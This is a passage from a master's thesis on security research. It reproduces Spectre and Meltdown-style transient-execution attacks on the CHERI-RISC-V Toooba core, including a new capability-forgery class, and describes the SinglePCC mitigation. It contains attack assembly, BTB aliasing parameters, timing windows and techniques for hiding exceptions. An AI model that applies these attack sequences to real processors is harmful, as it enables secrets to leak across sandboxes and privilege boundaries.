5.1.1 Spectre-PHT The CHERI-assembly code of my reproduction of the Spectre-PHT attack is depicted in Figure 5.1. This is a close reproduction of the original work by Kocher et al. [22] that has been introduced in Section 2.2.1. The example checks whether an index (held in a0) is less than a global comparison variable

38 CHAPTER 5. CHERI-RISC-V RESULTS 39

CHERI asm CHERI C Spectre-PHT ✓/ ✗ ✓/ ✗ Spectre-PHT Write ✗ - Spectre-BTB ✓ ✓ Spectre-RSB ✓ ✓ Spectre-STL-Load ✓ ✓ Spectre-STL-Jump ✓ - CHERI-Sandboxes ✓ - Priv-Mode-Regs ✓ - Priv-Mode-Exec ✓ -

Table 5.1: Overview of attempted Spectre-style attacks in CHERI-RISC-V Toooba and whether they were successful. Spectre-PHT is classed as (✓/✗) as its success depends on the concrete capability configuration.

(stored at the address pointed to by ca2). If this is the case, an array holding secret values (with its base address being held in ca1) will be accessed at index a0. The resulting value will be used as the index to another array (with its base address being held in ca3). In this example, I assume that the memory ad- dresses pointed to by ca3 are also visible to the attacker, e.g., a page between the victim and the attacker. Furthermore, I assume that ca1 al- lows access to more addresses than [ca1.baseaddr, ca1.baseaddr+length−1], where length is the global comparison value stored at the address pointed to by ca2. This can either be caused by capabilities not being configured suit- ably or by bounds not being exactly representable due to bounds compression as it is done with 128-bit capabilities [38]. In my example, I decided to train Toooba’s tournament predictor to always choose the local predictor, which will then return not taken. In order to reach that, I call the assembly code in Figure 5.1 eight times with values for a0 such that the a0 ∈ [0,..., 0x1f] holds. This will train the local BHT to return not taken for this particular branch and train the selector to always choose the local predictor for this branch. My choice for the other parameters remains the same over the training phase and is shown in Table 5.2. After the training phase, the attacker can start the actual attack. For the actual attack, I choose the index to the secret array to be 0x40 (a0 = 0x40). For all other parameters, I use the values presented in Table 5.2. As a preparation of the attack, I ensure that the load to the address stored in 40 CHAPTER 5. CHERI-RISC-V RESULTS

// a0: index to secret array slli t1, a0, 3 cincoffset ca1, ca1, t1 // ca1: secret array base addr. cld t0, 0(ca2) // ca2: comparison value bge a0, t0, end cld t2, 0(ca1) // access secret value // use spec. execution cincoffset ca3, ca3, t2 // ca3: shared mem. page cld t2, 0(ca3) end: // other code

Figure 5.1: Reproduction of the Spectre-PHT attack in CHERI assembly.

Capability Reg Description ca1: capability spanning [0x80001000 , 0x80001fff ] ca2: capability spanning [0x80002000 , 0x80002007 ] 8 byte value 0x20 at this address ca3: capability spanning [0x80003000 , 0x80003fff ]

Table 5.2: Parameter configuration used for the Spectre-PHT attack. ca2 will miss all caches. This is important to the attacker as the outstanding load poses a dependency to the following branch instruction. Because of the previous training phase, the branch bge will be predicted to not taken. This means that from this point on the code following the branch instruction will be mispredicted and therefore executed transiently. Due to the outstanding load the misprediction cannot be resolved for the entire miss penalty time of the load. The first speculative load following the mispredicted branch instruction will be a memory access to the address 0x80001200 returning the value 0x200 in my example. This value is added in the next instruction to ca3, which points to a memory region also accessible to the attacker. However, the first load was illegal because the code does not allow accesses to addresses 0x80001100 or greater. Later, Toooba will resolve this and rollback the speculatively executed instructions, but the second load to an attacker accessible array has already been issued and can be detected by the attacker. This attack is classed as (✓/✗) as its success depends on the configuration CHAPTER 5. CHERI-RISC-V RESULTS 41

of the capability used for the first load. In both cases the code forbids the first memory access, but the capability configuration is different in these two instances of Spectre-PHT. If the capability is configured such that the mem- ory access is out of capability bounds, the attack will not work. Otherwise, the attack will work. For the explanation of why the capability configuration mitigates the attack, see Section 5.2.1. The important factor in this attack is the miss penalty of the load through ca2. If this load missing all caches returns before the second load has been issued, the attack will not be successful because Toooba will detect the mis- prediction and not issue the second load and thus the attacker cannot detect the timing difference through the cache later. In my simulation, it took the load 61 cycles from leaving the core until the value has returned. The first specula- tive load is issued one cycle later and the second speculative load seven cycles after the first load. Therefore, Spectre-PHT works as 53 cycles are left. This means that an attacker can effectively use the spare cycles for executing other transient instructions that reveal more complex internal state, e.g. shifting and adding register values and then performing a load dependent on this data.

5.1.2 Spectre-PHT-CHERI-Write When code is using capabilities in Toooba, this attack is successfully miti- gated by CHERI. In my example, the attacker writes a double word to memory, which effectively clears the tag bit of the capability stored at this address as the stored data is no capability itself. Therefore, when the load of the return address is conducted, this will lead to an invalid code capability being stored into the return address register. Toooba cannot jump to this capability and therefore this specific attack is successfully mitigated. Furthermore, a suitable capability configuration, which enforces tight bounds, mitigates this specific attack and variants of it in the first instance as described in Section 4.2.1.

5.1.3 Spectre-BTB on CHERI-Sandboxes Sandboxes are designed to have strong memory protection against each other. One sandbox is not allowed to leak secrets to another sandbox. Inspired by Jonathan Woodruff and Jessica Clarke, I created an example that allows an adversary sandbox to leak information from another sandbox. Software com- partmentalisation is one of the main goals of CHERI – this attack has specif- ically been designed to circumvent compartmentalisation and leak secrets of a victim sandbox. This example contains two sandboxes. One of them is an 42 CHAPTER 5. CHERI-RISC-V RESULTS

sand1_code: // load capability to jump to clc ct1, 16(ct6) // load pcc into cs7 auipcc cs7, 0 // this jump is aliased in the BTB cjr ct1

Figure 5.2: Code snippet of victim code in a sandbox which is under attack. adversary sandbox, the other one is benign. The benign sandbox is referred to as sand1, whereas the attacker sandbox is called attackbox. The code of sand1, which is the victim sandbox being attacked by attack- box, is depicted in Figure 5.2. The first instruction in the code of sand1 loads a capability from memory and the last instruction jumps to it. The second in- struction, auipcc, adds the second operand – shifted by 12 bits to the left – to the current PCC. Since the second operand is zero in this example, auipcc writes the current PCC to cs7. This is a common way to produce capabilities for accessing data in CHERI-RISC-V and is regularly used by CHERI-LLVM.

Attacking Toooba’s BTB The goal of the attack is to trick Toooba into speculatively jumping from the benign sandbox sand1 into the attacker sandbox attackbox. Speculation for indirect jumps – these are jumps like cjr ct1 – is done with help of the BTB. To fully understand the design of the attack, I need to explain Toooba’s BTB and the hashing function I added. The BTB is an indexed array with 256 entries of the form depicted in Figure 5.3. An entry has three fields: one valid bit, an 8-bit tag, and the destination PCC target. When a jump is taken, a BTB entry will be updated. The index of this entry is determined by PCCj[8 ∶ 1], where PCCj is the PCC of the jump instruction. PCCj[X ∶ Y ] denotes a selection of bits X down to Y from PCC, where the index 0 is the Least Significant Bit (LSB) and index bitfield.length − 1 is the Most Significant Bit (MSB) of a bit field. The tag is calculated by splitting up the address of

PCCj into bytes and XOR-ing all eight bytes. The target PCC is the PCC to be executed in case the jump is taken. If a BTB entry is updated, its valid bit will be set. The valid bit of each entry is zero at the start-up of the branch or if set so by hardware, e.g., if branch prediction state flushing is implemented as described in Section 2.3.2. When a branch prediction from the BTB is CHAPTER 5. CHERI-RISC-V RESULTS 43

V ’1 T ag’8 T arget’129

Figure 5.3: Fields of an entry in Toooba’s BTB. required, the index and the tag for that PCC is calculated and only if the valid bit at that index is set and if the calculated tag compared the tag stored at that index is equal, this is deemed a valid branch prediction and Toooba will speculate to the target PCC of this entry. The attacker wants to place an entry into the BTB so that the jump in Fig- ure 5.2 speculatively leads to attacker chosen code execution when the victim sandbox sand1 executes the next time. For this attack, I assume that the at- tacker can freely choose the address where their code is placed in the address space. In order to alias a BTB entry, an attacker needs to place a jump in- struction at an address so that the following requirements are fulfilled, where

PCCb is the PCC of the jump in the victim sandbox, PCCa is the jump in the attacker sandbox, addr() is the function that extracts the address of the its argument PCC, and tag() is the function that calculates the tag by XOR-ing the bytes of the respective PCC:

PCCb[8 ∶ 1] = PCCa[8 ∶ 1] (5.1)

tag(addr(PCCb)) = tag(addr(PCCa)) (5.2)

Mapping the attacker jump instruction to the same index in the BTB is an easy task for an attacker. The more interesting task is to align the PCC of the attacker jump instruction so that the tag value equals the tag of the victim sandbox PCC tag. The sandbox to be attacked – sand1 – has a PCC with the start address 0x80020000 and the length is 0x2000. The jump instruction cjr ct1 is at the PCC: 0xffff200000018005 _0000000080020244 . This is the entire 128 bit code capability. As depicted in Figure 2.5, the upper 64 bits contain the otype, the permissions, and the compressed bounds whereas the lower 64 bits contain the actual address. The address is important in this attack scenario and therefore separated by an underscore character from the rest of the capability. I did not include the tag bit for capabilities in the description in this subsection. It is obvious that all capabilities need to have valid tag bits in order to be used for jumping and dereferencing memory. I chose the attacker sandbox attackbox to start at the address 0x80040000 and have a length of 0x20000. I decided to choose 0xffff20000001a001 _0000000080042044 as the PCC for the jump. With that I wanted to demonstrate that it is possible 44 CHAPTER 5. CHERI-RISC-V RESULTS

to conduct the attack in a single address-space operating system and that both victim and attacker sandbox do not need to have the same bounds:

PCCb = 0xffff200000018005 _0000000080020244 (5.3)

PCCa = 0xffff20000001a001 _0000000080040444 (5.4)

tag(addr(PCCb)) = tag(addr(PCCa)) = 0xc4 (5.5)

PCCb[8 ∶ 1] = PCCa[8 ∶ 1] = 0x22 (5.6)

Conducting the Attack Now, that we have understood how to alias an entry in the BTB, we have done the most important part of the attack. The next step an attacker needs to con- duct, is to actually place an entry at the respective index – this can be con- sidered the training phase of the BTB. In order to achieve this, the attacker runs its code – including the jump at PCCa – that branches to an attacker chosen target. This target is the gadget the victim sandbox will speculatively jump to during the actual attack. Suitable targets are explained in the follow- ing paragraphs. The second training step is to ensure that the first instruction in Figure 5.2 misses all caches in order to successfully misspeculate as long as possible. If this was not the case, Toooba would quickly load the correct PCC to jump to and correct its misspeculation before the transient-execution sequence in the target gadget could take effect. After this training phase, the attacker triggers or awaits the next execution of sand1. The load will miss all caches and Toooba will speculatively jump to the attacker’s gadget with the entire register state of sand1 being present. The attacker can use the register state from sand1 in multiple ways to achieve different goals of their attack. First, the attacker can leak one or more secret values stored in a register. This can be the case if sand1 computes on secret data, e.g., an encryption key. In order to reveal the secret, the attacker performs a load to an attacker accessible array index by the secret. Second, the register state can give the attacker access to a memory location of inter- est, e.g., because only sand1 has a capability to this memory location. The attacker loads the value of interest and conducts a second load to an attacker accessible array indexed by that value in order to reveal it. Furthermore, it is possible to load other capabilities through capabilities being present in the current register state of the victim. In my example of the attack, I sought to use the second method. The load missing all caches needs 88 cycles from being issued to memory until returning to the core. The first speculative memory CHAPTER 5. CHERI-RISC-V RESULTS 45

access in the gadget fetching the secret into the core is issued with 20 cycles left and the revealing load with 12 cycles left, which explains why the attack is successful. This sandbox attack includes the basic Spectre-BTB attack as demonstrated in [22]. The pure Spectre-BTB attack has also been reproduced in this thesis work, but will not be shown since its mechanism is included in this attack. Fur- thermore, I produced other Spectre-BTB attacks, e.g., attacking direct jumps and similar attacks. However, these were either not successful or could not contribute to attack Toooba in a way not already explained. Therefore, I don’t explain these attacks in this text.

5.1.4 Priv-Mode Attacks The sandbox attacks bring up the question whether it is possible to speculate over different privilege modes in RISC-V. I constructed two attacks proving the hypothesis that it is possible, which are referred to as Priv-Mode-Regs and Priv-Mode-Exec in Table 5.1. For both attacks, the scenario is that privileged code, e.g., kernel code, is being executed in S privilege mode, whereas the at- tacker code resides in U privilege mode. The goal of both attacks is to specula- tively jump to the gadget chosen by the attacker. This scenario can be found in real-world attacks as well as operating systems usually run in S privilege mode in RISC-V [12]. A real-world attack for this scenario is further explained in Section 6.1.4. None of the priv-mode attacks is possible if the Supervisor User Memory (SUM) bit is cleared in sstatus. This mechanism prevents code running in S mode from accessing pages that are accessible by U mode code1. The SUM mechanism and related principles are thoroughly explained in the privileged specification [12].

Priv-Mode-Regs This attack is close to the sandbox attack presented in Section 5.1.3. The goal of this attack is to speculatively jump from S privilege mode to U privilege mode in order to use the register state set up by the S mode code. The two main parts of the attack are again aliasing an entry in the BTB and delaying a load such that a jump depending on that load will speculatively lead to the execution of the attacker’s chosen gadget residing in U mode. Equal to the sandbox attack, the goal of the attacker is to make use of the register state

1Code pages accessible by U privilege mode code have the U(ser) bit set in the respective PTE. 46 CHAPTER 5. CHERI-RISC-V RESULTS

of the S mode code by either leaking a value from or through the register state. I constructed an attack that manages to leak a value through a powerful capability of the kernel being present in the current register state. Another particularly interesting target are Special Capability Registers (SCRs) as they are expected to hold powerful capabilities.

Priv-Mode-Exec The difference of this attack compared to the Priv-Mode-Regs attack is that the attacker-chosen gadget makes use of the fact that the processor continues to execute in S privilege mode in speculation. This means that the attacker has permission to access CSRs. In my example, the gadget accesses sscratch – which has been previously written to by the kernel – and then performs a load to an attacker accessible array indexed by the value in sscratch. This attack requires the PCC in U privilege mode to have its Access System Registers (ASR) set as ASR restrains access to both CSRs and SCRs. RISC-V constrains the access to CSRs by privilege modes, but CHERI-RISC-V adds the ASR functionality on top. ASR restricts access to all CSRs, but seven white-listed ones in which sscratch is not included [37]. This attack demonstrates how to make use of the register values accessible to the code the speculative jump came from. For this attack, it is important to understand that the privilege mode a RISC-V microprocessor currently operates in is an internal state and can only be influenced by traps and their respective return operations. Furthermore, this means that code can be executed in every privilege mode as long as it does not contain privilege mode specific instructions, as for example mret that can only be used in M privilege mode. A mret instruction executed in S or U privilege mode will lead to an exception being raised. In my example the revealing gadget is executed in both S and U privilege mode.

5.1.5 Spectre-RSB Similar to the BTB, the RSB can contain powerful capabilities that can be of use for an attacker. The code depicted in Figure 5.4 shows an example of priv- ileged code that is called from user space. First, the code loads a new address into the return address register cra. Next, the code loads its PCC into a reg- ister, adds an offset to the capability address and stores a secret value to this memory location. Finally, the code returns to the address previously loaded into cra. However, Toooba will predict the return address and use the top entry of the RSB for the prediction. This entry is a capability pointing to the CHAPTER 5. CHERI-RISC-V RESULTS 47

kernel_funct: // load new return address clc cra, 0(cs2) // load kernel pcc into ct6 auipcc ct6, 0 li t1, 0x200 cincoffset ct6, ct6, t1 li t1, 0x400 // store secret csd t1, 0(ct6) // return cret

Figure 5.4: Privileged code whose return address will be mispredicted in the Spectre-RSB attack. next instruction of the calling function. The RSB contains this entry because the call to the privileged function caused the hardware to push it there. There- fore, Toooba will speculatively jump to unprivileged code with the register state of the privileged code. In fact, Toooba will always speculatively jump to the next instruction of the calling code in the example depicted in Figure 5.4. Later, Toooba will jump to the actual PCC when it realises its misspeculation. Spectre-RSB gives the attacker the same possibilities to make use of the reg- ister state of the privileged code as Spectre-BTB does. I created an example that uses a powerful capability in the speculative register state in order to pull a secret into the core and make it visible to the attacker via a second load. What this attack needs is a mismatch between the software return address and the address stored in the RSB. In my example, this is achieved by loading another address into cra. For the attack to work, I made this load miss all caches. This gives attackers the biggest possible time window to transiently perform other loads that make the secret visible. As described in Section 4.1.4, overflowing the RSB can also create a mismatch between hardware and soft- ware return addresses. I successfully conducted this attack type in CHERI- RISC-V assembly as well. Note that this only works if the capabilities allow these memory accesses following previous explanations. 48 CHAPTER 5. CHERI-RISC-V RESULTS

clc ca1, 0(cs1) // ca1 and cs2 hold the same capability csd a4, 0(ca1) // memory disambiguation will lead to // this being executed with stale data cld a2, 0(cs2) cincoffset cs3, cs3, a2 cld a3, 0(cs3)

Figure 5.5: Reproduction of the Spectre-STL attack in CHERI-RISC-V as- sembly.

5.1.6 Spectre-STL Spectre-STL-Load and Spectre-STL-Jump both rely on the fact the memory disambiguation predicts a store-load pair to be independent although they ac- cess the same . As shown in Table 5.1, both Spectre-STL variants work in CHERI-RISC-V Toooba.

Spectre-STL-Load The code depicted in Figure 5.5 shows the sequence of instructions build- ing the actual attack. The first instruction loads the capability at the address pointed to by cs1 into ca1. I constructed the attack such that cs2 is stored at this memory address. In my example, ca1 and cs2 are identical capabil- ities, but in order for the attack to be successful they only need to point to the same memory address. The following store and load instructions are ex- ecuted out-of-order and in the assumption that they are non-dependent since they use different capability registers for memory accesses. However, this is not the case as both the store and the load go to the same memory address. This load will be executed earlier than the store and therefore it does not return the data of the store, but the previous content stored at this memory address. The transient-instruction sequence following the load of the stale data will reveal the secret data. Issuing a load of a value indexed by the secret to an attacker accessible array with its base address stored in cs3 makes the secret visible to the attacker. Toooba’s memory disambiguation and out-of-order execution enable this attack. When a memory instruction reaches the Rename stage, one instruction per cycle is enqueued to the memory from which the mem- CHAPTER 5. CHERI-RISC-V RESULTS 49

ory pipeline pulls out its instructions. The memory pipeline will execute the instructions as soon as all source register values are available. Toooba does not have a dedicated unit for disambiguating memory accesses – it assumes that memory accesses to different registers are not dependent. In case they are, Toooba will perform a rollback and re-execute the affected instructions. In my example, the first load introduces a delay for the second instruction as they overlap in architectural register use. The second instruction cannot pro- ceed in the memory pipeline. However, the third instruction can proceed in the memory pipeline and produce its result as it does not overlap in architectural register use. This leads to the transient-instruction sequence being executed with stale memory data.

Spectre-STL-Jump The setup for this attack is similar to the attack on RISC-V Toooba presented in Section 4.1.5 with the difference that capabilities are used instead of in- teger pointers. The fact that the stale value being loaded is not data, but a valid code capability does not change the feasibility of this attack. The code capability is valid and therefore Toooba takes the indirect branch to this ca- pability’s address. Analogously to Spectre-STL-Load, the memory accesses are not out-of-bounds and hence CHERI does not prevent this sequence of speculative instructions. The attack works because Toooba generally assumes memory operations not to be dependent as described above.

5.2 Meltdown Attacks

Table 5.3 shows an overview of the Meltdown attacks reproduced on CHERI- RISC-V Toooba during this thesis work and whether they were successful. Analogous to presenting the Spectre attacks, some attacks show large similar- ities and therefore the common attacking techniques are explained only once.

5.2.1 Meltdown-US-CHERI Meltdown-US-CHERI is an adaption of Meltdown-US. Instead of attempting to read from a page, which the attacker does not have sufficient rights to ac- cess, I attempted to read from a memory address through a capability out of its bounds. This attack is especially tailored to CHERI – the results of the re- production of the original Meltdown-US attack are presented in Section 4.2.1. 50 CHAPTER 5. CHERI-RISC-V RESULTS

CHERI asm Meltdown-US-CHERI ✗ Meltdown-GP-CHERI ✗ CBuildCap-Load ✓ CSetBounds-Load ✓ CInvoke-Load ✓ CUnseal-Load ✓

Table 5.3: Overview of attempted Meltdown-style attacks on CHERI-RISC-V Toooba and whether they were successful.

The code for the attack is shown in Figure 5.6. The attack consists of three basic parts. First, the attacker increases the offset to a desired address out of capability bounds. The reader has to note that in CHERI setting the address out of bounds is no illegal operation itself, but the memory access itself is. This memory access done with the second instruction is the next part of the attack. This loads the desired secret into the register t2. The following two instructions are the final part of the attack and reveal the secret by a load to an attacker accessible array with its base address in ct1. However, this attack could not be conducted successfully in CHERI-RISC- V Toooba. Its memory pipeline consists of multiple stages that dispatch the instruction, read the register values, calculate the virtual address, translate the virtual address to the physical address, and finally enqueue the memory access into the LSQ. The last two pipeline stages are depicted in Figure 4.2. In the last pipeline stage, Toooba performs the capability bounds checks and sets the exception cause field in the corresponding LSQ entry in case an exception is detected. Toooba only issues valid requests – without the cause field set – to memory. Therefore, the out of bounds load will never be issued, which effec- tively mitigates the entire attack. No revealing transient-execution sequence is possible because the necessary result never becomes available.

5.2.2 Meltdown-GP-CHERI The Meltdown-GP attack – presented in Section 4.2.2 and the Meltdown-GP- CHERI attack have large similarities. Both attacks seek to read a register, which the code has no permissions to read. In my Meltdown-GP-CHERI ex- ample, the attacker wants to access the SCR mscratchc, which cannot be ac- cessed if the current PCC does not have the ASR bit set, which is the case in my CHAPTER 5. CHERI-RISC-V RESULTS 51

melt_us_cheri: // set ct0 offset out of bounds cincoffsetimm ct0, ct0, 512 // perform load out of capability bounds cld t2, 0(ct0) // load again from another capability with offset cincoffset ct1, ct1, t2 cld t2, 0(ct1)

Figure 5.6: Reproduction of the Meltdown-US attack tailored to CHERI ca- pabilities. setup for this attack. The access is followed by a load to an attacker-accessible array in order to make the secret visible. Meltdown-GP-CHERI is therefore a variant of Meltdown-GP tailored to CHERI systems as they offer the ASR functionality compared to conventional RISC-V systems. However, as marked in Table 5.3, this attack is not possible on CHERI-RISC-V Toooba. Similar to the description of Meltdown-US in Section 4.2.2, checking whether the ASR bit is set is done as a part of the Rename stage in Toooba. This leads to the instruction being marked as executed in the ROB entry, which means that it never enters the ALU pipeline. Therefore, the result will never be produced, which mitigates the attack as the following transient-instruction sequence can- not reveal the secret register value.

5.2.3 Meltdown-CF Meltdown-CF (Capability Forgery) is a new subclass of transient-execution attacks that was developed in this master’s thesis work. The goal of all at- tacks in this subclass is the same: forging a capability to memory that the attacker should not have access to in speculation and using this accordingly in order to leak secrets. Therefore, Meltdown-CF attacks pose a large threat to CHERI systems. All attacks in the Meltdown-CF class are inspired by Jonathan Woodruff and members of the CHERI team who suspected a vul- nerability in CHERI-RISC-V Toooba and encouraged me to attempt these ex- ploits. 52 CHAPTER 5. CHERI-RISC-V RESULTS

CBuildCap The CBuildCap instruction has been added to CHERI-RISC-V in order to increase performance when importing capabilities. CBuildCap attempts to build a capability from a bit pattern. This instruction has three operands: The bit pattern stored in a capability register, an authorising capability stored in another capability register, and the destination capability register. The bit pat- tern does not need to be tagged, but it must not pose an escalation of privileges of the authorising capability. If this invariant is broken, an exception will be raised [37]. The CBuildCap instruction can be logically split into two sub- operations. First, the capability checks have to be conducted. Second, if the capability checks were successful, the input capability bit pattern is tagged – therefore becomes a valid capability – and written to the destination register. The main part of the attack code is depicted in Figure 5.7. This code is expected to run in an attacker controlled compartment whose PCC is limited to certain addresses. In this scenario, the attacker can be a user that now acts as an adversary on a CHERI system. The goal of the attacker is to speculatively craft a powerful capability in order to read secrets of other compartments. The register a0 holds the index to be used to access the speculatively created capability and ca1 holds the bit pattern to be used with CBuildCap. The index is shifted logically left by four bits in order to produce 16 byte memory chunks to be accessed. The attack is designed such that the load following the shift instruction will miss all caches and therefore produces the maximum load penalty possible. The CBuildCap instruction is not dependent on the previous instructions and can be executed out-of-order before the load has to finish. In fact, all instructions following the load are not dependent on the load. Therefore, all of these instructions can be executed before the slow load finishes, but none of them can commit before the load commits. The CBuildCap instruction has cs1 as authorising capability, which is derived from DDC, but limited to the addresses [0x80001000 − 0x80002000], which in my example is the most powerful data capability the attacker has access to. The bit pattern passed in ca1 is the almighty capability spanning the entire address space with the tag bit stripped. However, this breaks the invariant that the authorising capability must be equally or more powerful than the bit pattern. The CBuildCap instruction will fail, but for now we assume that it does not and that all subsequent instructions will be executed normally. Next, the attack uses the index calculated before and adds it to the capability address. This is the address of the secret value, which is loaded in the next instruction. This secret value is used as an index to a user accessible array, CHAPTER 5. CHERI-RISC-V RESULTS 53

access_funct: // a0: index to 16 byte chunks // ca1: bit pattern for capability to be build slli a0, a0, 4 // misses all caches and produces // maximum miss penalty cld t1, 0(cs1) // will raise an exception, but before // that it will reveal the secret cbuildcap ct2, cs1, ca1 cincoffset ct2, ct2, a0 // load twice to reveal secret cld t0, 0(ct2) cincoffset cs7, cs7, t0 cld t0, 0(cs7) cret

Figure 5.7: Overview of the CBuildCap attack code. which cs7 is the base address of. The load to this address reveals the secret to the attacker as they can probe the user accessible array later in order to find out the secret value. Toooba’s ALU has four pipeline stages: Dispatching the instruction to the ALU, reading the register values, doing the actual operation, and writing back the calculated value. Toooba reverses the order of the sub-operations for CBuildCap in order to improve performance. It first tags the input data and then performs the capability checks, which are called CapMod and CapCheck in Figure 5.8. This means that there exists a tagged capability that has not been checked yet in the actual executing stage. In the next stage, the writeback stage called FinishALU in Figure 5.8, Toooba performs the actual checks and finishes the execution of CBuildCap by marking it as executed in the ROB. This will also set a field in the ROB that this instruction created an exception. In order to improve performance Toooba uses forwarding of ALU results to subsequent operations. In general, forwarding avoids stall cycles that would be introduced by writing the result to the register file and other operations having to wait to read this value. Toooba, uses forwarding in both the ExeAlu and the FinishALU stage as well as writing the data to the register file in the FinishALU stage. For my attack, this means that the powerful tagged capability will be 54 CHAPTER 5. CHERI-RISC-V RESULTS

speculative capability trap values code

ExeALU FinishALU RegisterFile CapMod CapCheck ReorderBuf

Figure 5.8: The last two stages of the Toooba ALU pipeline which forwards modified capabilities before performing capability checks.2 forwarded to subsequent instructions which use the result of the CBuildCap instruction. An instruction commits when it is at the head of the ROB. Toooba raises an exception at the commit phase because at this point of time it is certain that the exception really occurred as the exception could have also come from a speculative execution path that should not have been taken. In the mean- time, the speculatively crafted almighty capability can be freely used to access the entire memory space, e.g., to read secret memory of other compartments. This is possible because – as many other processors – Toooba does not stall its pipeline in case of a speculative hardware exception in order to increase performance. The attack – as depicted in Figure 5.7 – will cause the operating system to react to the hardware exception being raised. This will lead to the termination of the process running this code, which can be disadvantageous for the attacker for two reasons. First, the attacker often wants to conduct the attack multiple times and therefore wants to keep the victim process running. Second, the exception will entail a call to the operating system’s exception handler, which will perform load operations itself and therefore might cause a lot of noise from the attacker’s point of view. As described in [27], an attacker has multiple options to hide the exception. One option is to fork a child process and execute the attack code there. This will solve the problem of keeping the actual attack process open, but still the child process will trigger the invocation of the exception handler and poten- tially make the results useless because of noise. Another option is to hide the CBuildCap instruction and the transiently executed instruction sequence in a speculative frame. This means that I insert a branch instruction before the

2This figure is borrowed from the CHERI team CHAPTER 5. CHERI-RISC-V RESULTS 55

CBuildCap instruction with a branch target that lies after the second tran- sient load. The branch instruction needs to be slow to resolve for Toooba, which can be achieved by making the branch instruction dependent on a load that misses all caches. I train the branch so that the actual attack code path will always be predicted to be taken as explained in Section 5.1.1. During the actual attack, I provide parameters such that the attack code will eventually not be taken. Therefore, the attack code still is executed speculatively, but the ex- ception is hidden because of the rollback that Toooba will eventually perform. This step is combining the CBuildCap attack with a Spectre-PHT attack as suggested by Lipp et al. [27]. This solves both keeping the process open and avoiding the invocation of the exception handler because the exception never occurs on the architectural level. One drawback is that the effective speculative window for the attacker becomes smaller due to an extra instruction that has to be executed before the actual attack code. However, this proves to be no problem in Toooba and I have successfully crafted this variant of the CBuildCap attack. Another mechanism proposed in [27] is the use of transactional memory. If a failure occurs in a sequence of memory accesses that are made transac- tional by the architecture, all operations in that transaction will be rolled back. However, effects to the cache might have already taken place and secrets can be leaked therefore. RISC-V mentions the Standard Extension for Transac- tional Memory. However, this has not been specified yet [11]. Therefore, this cannot be used on RISC-V architectures to hide an exception.

CSetBounds This attack is comparable to the CBuildCap attack presented above. The goal of the attack is to extend the bounds of a capability, which breaks the monotonicity constraint of CHERI capabilities. The CSetBounds instruc- tion sets the bounds of a capability while ensuring monotonicity. If the new value for the bounds is greater than the value so far, an exception will be raised [37]. The attack is performed the same way the CBuildCap attack was performed. A load that misses all caches – or any instruction that intro- duces a delay long enough – enables the transient-execution sequence to take effect before the exception caused by the CSetBounds instruction is raised. The transient-execution sequence comprises the following steps: setting the address to a value of interest for the attacker, accessing that value, and finally accessing an attacker-visible array with the secret as the index in order to leak the secret. 56 CHAPTER 5. CHERI-RISC-V RESULTS

Analogous to the CBuildCap attack, the CSetBounds attack will raise an exception in the form presented above. As explained, hiding the exception in a speculative frame is the best option for an attacker. I have successfully implemented both a variant that eventually raises a hardware exception and a variant that hides the exception.

CInvoke Both the CBuildCap and the CSetBounds attack operate on conventional unsealed data capabilities. In contrast, this attack works on sealed capabilities. Sealed capabilities cannot be dereferenced and thus are not of great use to an attacker. Therefore, it is the attacker’s goal to unseal this data capability and access the memory addresses it grants access to. Since sealed capabilities cannot be dereferenced, it is deemed secure to pass them to non-trustworthy processes. This way, an attacker can get access to a sealed data capability. The CInvoke instruction was designed to allow fast jumps between pro- tection domains. This is enabled by having a sealed code capability to the code the user wants to jump to and by a sealed data capability – these two capabili- ties together form a pair of capabilities. CInvoke unseals the code capability and jumps to it. Furthermore, it unseals the data capability and moves it into a general purpose capability register. In order to be considered a valid operation, CInvoke needs to pass many checks, e.g. both capabilities need to be tagged and sealed. In my scenario, I primarily attack the fact that the capability pair is required to have the same otype. However. I violate multiple other in- variants as well [37]. A failure of these checks will lead to an exception being raised by Toooba. My approach for the attack is to use a code capability that points to a gadget in the attackers code space. For the data capability, I use a powerful sealed capability that the attacker does not have a suitably authorising capability to unseal. The CInvoke instruction is executed with these two capabilities as parameters. In order to delay the exception being raised, a load missing all caches is used again. With the exception being delayed, the code speculatively jumps to the attacker’s chosen gadget and the data capability is unsealed and forwarded. The gadget loads the secret and reveals it by a second transient load. Hiding the exception in a speculative frame is again the best way of conducting this exploit from an attacker’s perspective. CHAPTER 5. CHERI-RISC-V RESULTS 57

CUnseal Similar to the attack above, the goal of this attack is to unseal a capability without having the necessary privileges. The CUnseal instruction requires two parameters: the capability to be unsealed and the capability authorising this. If the CUnseal instruction fails, a hardware exception will be raised. For CUnseal, there are multiple reasons why this instruction can fail – in my attack I focus on a TypeViolation. This is caused if the otype of the sealed capability is not equal to the address of the authorising capability [37]. Again, in my attack scenario, the attacker has already obtained a powerful sealed data capability or can obtain it when needed, e.g., reading from shared memory with another process running on the CHERI system. The actual attack approach is similar to the CInvoke attack. The attacker does not possess a suitable capability that allows unsealing the powerful data capability. In order to delay the exception being raised, the attacker performs a load with a great miss penalty. Toooba’s forwarding again enables a transient- execution sequence to make a secret visible to the attacker. If an attacker wants to conduct the attack more than once, hiding the exception in a speculative execution frame is the best solution. Chapter 6

Discussion

One of the main goals of this thesis work is to contribute a platform to foster research of transient-execution attacks both on RISC-V and CHERI-RISC-V processors. The experiments presented in Chapters 4 and 5 show vulnera- bilities being present in Toooba and the need to develop and deploy mitiga- tion mechanisms. In this chapter, I describe how my framework impacted the CHERI team and helped to develop and improve SinglePCC – a mitigation mechanism against Spectre-style attacks in CHERI-RISC-V Toooba. Further- more, my work has triggered initial plans for Meltdown-CF mitigation.

6.1 SinglePCC

The SinglePCC mechanism has been mainly developed by Jonathan Woodruff and was inspired by my experiments and their results as all Spectre-style at- tacks were found to violate CHERI’s security model.

6.1.1 Mechanism As of now, CHERI-RISC-V Toooba uses the entire PCC of the target for branch prediction, which means that both the actual address and also the privileges including the bounds are predicted. SinglePCC removes the privileges com- pletely from the prediction. In order to determine whether an instruction is in bounds, it uses the PCC bounds of the last committed instruction. Whenever an instruction that changes the bounds, e.g., a cjalr instruction is executed, the bounds will be changed at well. The BTB or RSB only carry the address and no bounds or other privileges any longer. If the address of an instruc- tion is out-of-bounds of the current bounds, e.g., a target of a jump to another

58 CHAPTER 6. DISCUSSION 59

compartment, this instruction has to wait until its bounds can be derived from the current register state without speculation. This approach will decrease the overall system performance as additional pipeline flushes can be included by waiting for the bounds to be in the register state, but this approach does not allow any speculation over compartment boundaries.

